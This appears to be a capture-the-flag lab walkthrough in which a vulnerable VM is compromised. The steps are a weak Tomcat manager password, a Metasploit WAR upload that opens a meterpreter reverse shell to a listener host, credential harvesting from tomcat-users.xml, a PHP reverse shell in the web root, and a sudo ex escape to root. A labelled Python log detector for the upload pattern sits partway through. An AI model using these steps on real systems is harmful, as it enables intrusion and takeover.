# Lab setup
Download: Deploy
NAT, IP: 192.168.1.137
# Penetration process
# Initial information gathering
```
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
|   3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
|   256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_  256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp   open  http    Apache httpd 2.4.56 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.56 (Debian)
8080/tcp open  http    Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Apache Tomcat
```
8080 is running Tomcat, so uploading a WAR package is the obvious idea.
Tried a junk weak password on the manager backend: tomcat/s3cret
OK folks, we're in. Fire up msf, deploy a WAR package and grab a shell.
# WAR package exploitation
```
msf6 exploit(multi/http/tomcat_mgr_upload) > show options

Module options (exploit/multi/http/tomcat_mgr_upload):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  s3cret           no        The password for the specified username
   HttpUsername  tomcat           no        The username to authenticate as
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        192.168.1.137    yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT         8080             yes       The target port (TCP)
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /manager         yes       The URI path of the manager app (/html/upload and /undeploy will be used)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.129    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   Linux x86

View the full module info with the info, or info -d command.

msf6 exploit(multi/http/tomcat_mgr_upload) > run

[*] Started reverse TCP handler on 192.168.1.129:4444
[*] Retrieving session ID and CSRF token...
[*] Uploading and deploying mZDUACZIYO6...
[*] Executing mZDUACZIYO6...
[*] Sending stage (1017704 bytes) to 192.168.1.137
[*] Undeploying mZDUACZIYO6 ...
[*] Meterpreter session 3 opened (192.168.1.129:4444 -> 192.168.1.137:44790) at 2024-05-18 04:05:41 -0400
[*] Undeployed at /manager/html/undeploy
meterpreter > getuid
Server username: tomcat
```
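From the defender's side, the upload, execute, undeploy sequence shown in the msf output leaves a clear trace in Tomcat's access log. The following Python example is added here and is not part of the original writeup: it pairs a successful POST to /manager/html/upload with a later POST to /manager/html/undeploy from the same client, and the log lines it parses are constructed to mirror the session above.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed Tomcat access log lines (common log format) that mirror the
# manager upload -> execute -> undeploy sequence seen in the msf output above.
SAMPLE_LOG = """\
192.168.1.129 - tomcat [18/May/2024:04:05:39 -0400] "GET /manager/html HTTP/1.1" 200 21234
192.168.1.129 - tomcat [18/May/2024:04:05:40 -0400] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 18000
192.168.1.129 - - [18/May/2024:04:05:40 -0400] "GET /mZDUACZIYO6/ HTTP/1.1" 200 0
192.168.1.129 - tomcat [18/May/2024:04:05:41 -0400] "POST /manager/html/undeploy?path=/mZDUACZIYO6&org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 17000
10.0.0.5 - admin [18/May/2024:09:00:00 -0400] "GET /manager/html HTTP/1.1" 200 21234
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Parse one common-log-format line into a dict, or None if it does not match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec

def find_manager_deploys(log_text):
    """Per client IP, pair a successful POST /manager/html/upload with a later
    POST /manager/html/undeploy and return the context paths that were
    deployed and then removed again (the hit-and-run WAR upload pattern).
    Result: {ip: [(upload_timestamp, context_path, manager_user), ...]}"""
    pending = defaultdict(list)   # ip -> timestamps of uploads not yet undeployed
    findings = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        if rec["path"] == "/manager/html/upload" and rec["status"] == "200":
            pending[rec["ip"]].append(rec["ts"])
        elif rec["path"] == "/manager/html/undeploy" and pending[rec["ip"]]:
            context = rec["query"].get("path", ["?"])[0]
            findings[rec["ip"]].append((pending[rec["ip"]].pop(0), context, rec["user"]))
    return dict(findings)
```

Any hit here is worth an alert even when the manager login succeeded, since a legitimate operator rarely deploys and removes a random context within seconds.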
# Privilege escalation
None of the privilege escalation modules from suggest worked, so that route was dead.
Checked /etc/tomcat9/tomcat-users.xml and found another user: sa/salala!!
SSH in with it and we have sa's shell.
From ps -ef we can see that the toor user started the apache service, so we drop a PHP reverse shell into /var/www/html and visit it to trigger it, which gives us toor's shell.
sudo -l shows that ex is permitted.
```
$ sudo ex
!/bin/bash
```
Root obtained.
# Summary
Dig around more in the places on a server where credentials may be stored.